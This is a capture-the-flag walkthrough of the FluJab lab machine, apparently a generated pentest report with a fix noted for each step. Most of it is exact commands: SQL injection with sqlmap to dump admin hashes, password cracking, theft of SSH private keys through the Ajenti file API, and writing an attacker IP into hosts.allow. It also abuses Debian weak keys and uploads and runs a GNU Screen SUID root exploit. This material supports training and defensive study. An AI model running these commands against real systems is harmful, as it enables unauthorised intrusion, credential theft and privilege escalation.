FluJab
Summary
I inspected the TLS certificate on the target's HTTPS proxy and discovered a Subject Alternative Names list that mapped every internal virtual hostname — including administrative consoles never intended to be public. A client-side cookie on the flu-vaccination portal was set to the base64 encoding of '[REDACTED: recovered credential]' to unlock a hidden SMTP configuration panel, which redirected outbound mail to my own listener. A forged patient-session cookie bypassed the normal booking workflow, exposing an appointment-reminder form whose 'nhsnum' parameter was passed unsanitised into MySQL; a UNION-based injection dumped the admin table, yielding the 'sysadm' account and a SHA256 password hash that was cracked offline in seconds against a common wordlist.
Those credentials authenticated to an Ajenti administration panel on port 8080 whose file-viewer accepted arbitrary filesystem paths, leaking drno's SSH private key and the authorized_keys file. A network restriction enforced by TCP wrappers was neutralised by writing $ATTACKER_IP into /etc/hosts.allow through the same Ajenti file-write API. Drno's 4096-bit RSA key turned out to have been generated by a Debian system running the broken OpenSSL random-number generator (CVE-2008-0166), reducing the entire keyspace to roughly 32 000 predictable keys; a precomputed corpus match recovered the private key without cracking a passphrase.
SSH login as drno followed. A SUID-root installation of GNU Screen 4.5.0 — vulnerable to CVE-2017-5618 — was exploited from the drno session to achieve a root shell and read the root flag.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD3="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 2
echo | openssl s_client -connect $TARGET:443 -servername flujab.htb 2>/dev/null | openssl x509 -noout -ext subjectAltNameecho "$TARGET flujab.htb freeflujab.htb vaccine4flu.htb smtp.flujab.htb sys.flujab.htb console.flujab.htb sysadmin-console-01.flujab.htb" | sudo tee -a /etc/hostsFixRemove internal and administrative hostnames from the public-facing TLS certificateMedium
Exact commands 2
curl -sk -b 'Modus=$PASSWORD3' 'https://freeflujab.htb/?smtp_config'curl -sk -b 'Modus=$PASSWORD3' -X POST 'https://freeflujab.htb/?smtp_config' --data "mailserver=$ATTACKER_IP&port=25&save=Save+Mail+Server+Config"FixReplace client-side cookie-based feature gating with server-side authenticationCritical
Exact commands 3
curl -sk -X POST 'https://freeflujab.htb/?register' --data 'action=register' -c patient_cookies.txt -v 2>&1 | grep -i 'set-cookie'python3 -c "import base64, sys; print(base64.b64encode(('<patient_id>=True').encode()).decode())"sqlmap -u 'https://freeflujab.htb/?remind' --data 'nhsnum=1' --cookie 'Patient=<patient_cookie>; Registered=<forged_registered>; Modus=$PASSWORD3' --dbms mysql -D vaccinations -T admin --dump --batch --level 2FixParameterize all SQL queries to prevent injection through the appointment-reminder formCritical
Exact commands 2
echo '<sha256_hash_from_sqlmap>' > hash.txt && john --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txtjohn --show --format=Raw-SHA256 hash.txtFixRe-hash stored passwords using a slow, salted algorithmHigh
Exact commands 4
curl -sk -X POST 'https://sysadmin-console-01.flujab.htb:8080/api/core/auth' -H 'Content-Type: application/json' -d '{"username":"sysadm","password":"$PASSWORD","mode":"normal"}' -c ajenti.txtcurl -sk -b ajenti.txt 'https://sysadmin-console-01.flujab.htb:8080/api/filesystem/read//home/drno/.ssh/authorized_keys?encoding=utf-8'curl -sk -b ajenti.txt 'https://sysadmin-console-01.flujab.htb:8080/api/filesystem/read//home/drno/.ssh/user_key?encoding=utf-8' -o drno_user_keycurl -sk -b ajenti.txt -X POST 'https://sysadmin-console-01.flujab.htb:8080/api/filesystem/write//etc/hosts.allow' --data-urlencode "content=sshd: $ATTACKER_IP"FixRestrict the Ajenti file-manager API to safe paths and remove write access to system filesCritical
Exact commands 3
grep -rl -F "$(awk '{print $2}' /tmp/flujab_drno_authorized_keys)" /tmp/debian-ssh-4096/rsa/4096/*.pubchmod 600 /tmp/debian-ssh-4096/rsa/4096/[REDACTED: sensitive value]ssh -i /tmp/debian-ssh-4096/rsa/4096/[REDACTED: sensitive value] -o BatchMode=yes -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null drno@$TARGET 'id; cat /home/drno/user.txt'FixRevoke and replace all SSH keys generated by vulnerable Debian OpenSSL (CVE-2008-0166)Critical
Exact commands 4
ssh -i /tmp/debian-ssh-4096/rsa/4096/[REDACTED: sensitive value] -o StrictHostKeyChecking=no drno@$TARGET 'ls -la /usr/bin/screen; screen -v'searchsploit -p 41154scp -i /tmp/debian-ssh-4096/rsa/4096/[REDACTED: sensitive value] -o StrictHostKeyChecking=no /usr/share/exploitdb/exploits/linux/local/41154.sh drno@$TARGET:/tmp/41154.shssh -i /tmp/debian-ssh-4096/rsa/4096/[REDACTED: sensitive value] -o StrictHostKeyChecking=no drno@$TARGET 'chmod +x /tmp/41154.sh && bash /tmp/41154.sh && cat /root/root.txt'FixRemove the SUID bit from GNU Screen and upgrade to a patched versionCritical
Attack patterns used
The transferable techniques behind this compromise.
Local File InclusionWebT1190
What it is
A web app builds a file path from user input (?page=../../etc/passwd), letting an unauthorised user read arbitrary files or, via log poisoning, PHP wrappers (php://filter, data://), or session files, achieve code execution. LFI commonly leaks credentials, SSH keys, and source code that feed the next step.
Why it works
The app trusts a path parameter and fails to constrain it to an allow-list. Remediate by mapping identifiers to fixed file paths, disabling dangerous PHP wrappers, and canonicalizing/validating paths.
Read more
SQL InjectionWebT1190
What it is
User input is concatenated into a SQL query, letting an unauthorised user alter the query's logic — bypassing authentication, dumping tables (including password hashes), or, with stacked queries / file privileges, writing webshells or executing OS commands. sqlmap automates detection and exploitation across boolean/error/time/union vectors.
Why it works
The root cause is mixing untrusted data with query code instead of using parameterized statements. Remediate with prepared statements/ORM bindings, least-privilege DB accounts, and input validation.
Read more
SSH Private Key / Credential TheftCredential Access · Lateral MovementT1552.004
What it is
Foothold access frequently exposes reusable secrets: SSH private keys (~/.ssh/id_rsa), authorized_keys, config files, history, and backups. Recovering a private key lets an unauthorised user authenticate as that user (or pivot to other hosts that trust the key), often upgrading a shaky webshell into a stable SSH session.
Why it works
Keys and credentials get left in home directories, world-readable backups, and version control. Remediate by passphrase-protecting keys, scoping authorized_keys, and scanning for secrets at rest.
Read more
SUID/SGID Binary AbuseLinux · Privilege EscalationT1548.001
What it is
Files with the SUID bit run with the file owner's privileges (often root) regardless of who launches them. Finding an unusual SUID binary (find / -perm -4000 2>/dev/null) that has a shell-escape or file-read primitive — per GTFOBins — yields code execution as root.
Why it works
SUID is needed for a few system binaries (passwd, ping) but custom or misconfigured SUID files are a classic escalation. Remediate by minimizing SUID binaries, dropping privileges in custom tools, and monitoring the SUID inventory for drift.
Read more
Exposed services
| 22/tcp | ssh recon-sweep-discovered |
| 80/tcp | http nginx |
| 443/tcp | ssl/https ClownWare Proxy |
| 8080/tcp | ssl/http nginx |